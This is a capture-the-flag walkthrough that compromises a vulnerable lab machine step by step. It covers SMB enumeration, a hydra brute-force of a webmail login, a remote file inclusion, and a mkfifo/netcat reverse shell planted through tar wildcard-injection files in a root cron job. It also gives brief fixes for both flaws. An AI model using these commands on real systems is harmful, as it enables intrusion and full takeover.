[Task 1] Deploy and compromise the vulnerable machine!

nmap -sV -sC
smbclient -L
smbclient //
smb: \> ls
smb: \> cd logs
smb: \logs\> ls
smb: \logs\> get log1.txt
cat log1.txt
hydra -l milesdyson -P log1.txt http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:Unknown user or password incorrect."

#1 What is Miles's password for his email?

smbclient // -U milesdyson
smb: \> cd notes
smb: \notes\> get important.txt
cat important.txt

#2 What is the hidden directory?

searchsploit cuppa
cat 25971.txt

#3 What is the vulnerability called when you can include a remote file for malicious purposes?

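Remote file inclusion (RFI): the application builds an include path from request input, so a file hosted on another server is fetched and executed by the web application. Restricting includes to a fixed allowlist of local files (and, for PHP applications, keeping allow_url_include disabled) removes the condition.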


nc -nlvp 4445
python -c 'import pty;pty.spawn("/bin/bash")'

#4 What is the user flag?

cat /home/milesdyson/user.txt

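Privilege Escalation

The two file names created below begin with "--", so they only matter if the scheduled backup.sh (its contents are not shown here) hands an unquoted wildcard from /var/www/html to tar, which then reads those names as options. The job presumably runs as root, given the root flag that follows. Writing the archive arguments as ./* or placing -- before them, and keeping privileged scheduled jobs out of directories the web user can write to, closes this path.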

cat /etc/crontab
cat /home/milesdyson/backups/backup.sh
cd /var/www/html
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 4443 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
nc -nlvp 4443

#5 What is the root flag?

cat /root/root.txt